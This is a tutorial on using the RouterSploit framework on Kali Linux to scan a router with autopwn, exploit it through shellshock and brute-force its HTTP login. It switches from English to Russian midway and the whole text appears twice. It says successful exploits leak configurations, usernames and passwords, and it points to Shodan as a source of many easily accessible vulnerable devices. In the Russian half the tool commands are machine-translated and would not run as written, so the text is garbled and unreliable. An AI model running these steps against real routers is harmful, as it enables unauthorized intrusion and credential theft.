Requirements for routersploit:
Python
Internet access
Knowledge of command line
Installation of RouterSploit on Kali Linux:
Step 1. Installing routersploit
To install routersploit on Kali Linux, open the terminal and enter the following commands in the same order as below:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Step 2: Launching RouterSploit
To launch routersploit, you need to navigate to the directory of the tool and execute the following:
python3 rsf.py
If you want to see all possible exploits, simply enter the following:
show all
Now let's start by scanning the router and finding out if there are any vulnerabilities.
Step 3: Scanning the target
To scan the router for all possible exploits, we will use the Autopwn scanner module to find any vulnerabilities that affect our target router. But first, you need to find the IP address of the target router. I will show an example using my own.
By default, many routers use 192.168.0.1 or 192.168.1.1. And to scan the target, enter the following:
use scanners/autopwn
show options
In our case, we will set the target to the IP address of the router, 192.168.0.1. Enter "set target", then the IP address of the router, and then press enter. Then enter "run" to start the scan.
set target 192.168.0.1
run
Шаг 4: Выбор и настройка эксплойта роутера
После завершения сканирования мы увидим все уязвимости, которые затрагивают роутер.
Начнем с простого эксплойта. Давайте воспользуемся эксплойтом shellshock; введите следующие команды.
использовать эксплойты/универсальные/shellshock
показать параметры
Вы можете установить цель, набрав:
установить цель <IP-адрес целевого маршрутизатора>
Шаг 5: Запуск эксплойта
Вы можете запустить полезную нагрузку, набрав «run».
Если эксплойт будет успешным, вас поприветствуют внутренние параметры конфигурации и пароли, а также имена пользователей, которые можно использовать для взлома и управления маршрутизатором.
Эти эксплойты могут привести к утечке логинов и паролей пользователей, паролей по умолчанию (например, admin), серийных номеров устройств и т. д.
Например, если вы хотите подобрать и взломать имя пользователя и пароль маршрутизатора, введите следующие команды:
используйте creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce)> показать параметры
установить цель 192.168.0.2
запустить
В Shodan можно найти множество уязвимых устройств, к которым можно без проблем получить доступ.
Однако на практике с реальным внешним IP-адресом я этого демонстрировать не буду, дабы оградить неискушенные умы от несанкционированного доступа.
Python
Internet access
Knowledge of command line
Installation of RouterSploit on Kali Linux:
Step 1. Installing routersploit
To install routersploit on Kali Linux, open the terminal and enter the following commands in the same order as below:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Step 2: Launching RouterSploit
To launch routersploit, you need to navigate to the directory of the tool and execute the following:
python3 rsf.py
If you want to see all possible exploits, simply enter the following:
show all
Now let's start by scanning the router and finding out if there are any vulnerabilities.
Step 3: Scanning the target
To scan the router for all possible exploits, we will use the Autopwn scanner module to find any vulnerabilities that affect our target router. But first, you need to find the IP address of the target router. I will show an example using my own.
By default, many routers use 192.168.0.1 or 192.168.1.1. And to scan the target, enter the following:
use scanners/autopwn
show options
In our case, we will set the target to the IP address of the router, 192.168.0.1. Enter "set target", then the IP address of the router, and then press enter. Then enter "run" to start the scan.
set target 192.168.0.1
run
Шаг 4: Выбор и настройка эксплойта роутера
После завершения сканирования мы увидим все уязвимости, которые затрагивают роутер.
Начнем с простого эксплойта. Давайте воспользуемся эксплойтом shellshock; введите следующие команды.
использовать эксплойты/универсальные/shellshock
показать параметры
Вы можете установить цель, набрав:
установить цель <IP-адрес целевого маршрутизатора>
Шаг 5: Запуск эксплойта
Вы можете запустить полезную нагрузку, набрав «run».
Если эксплойт будет успешным, вас поприветствуют внутренние параметры конфигурации и пароли, а также имена пользователей, которые можно использовать для взлома и управления маршрутизатором.
Эти эксплойты могут привести к утечке логинов и паролей пользователей, паролей по умолчанию (например, admin), серийных номеров устройств и т. д.
Например, если вы хотите подобрать и взломать имя пользователя и пароль маршрутизатора, введите следующие команды:
используйте creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce)> показать параметры
установить цель 192.168.0.2
запустить
В Shodan можно найти множество уязвимых устройств, к которым можно без проблем получить доступ.
Однако на практике с реальным внешним IP-адресом я этого демонстрировать не буду, дабы оградить неискушенные умы от несанкционированного доступа.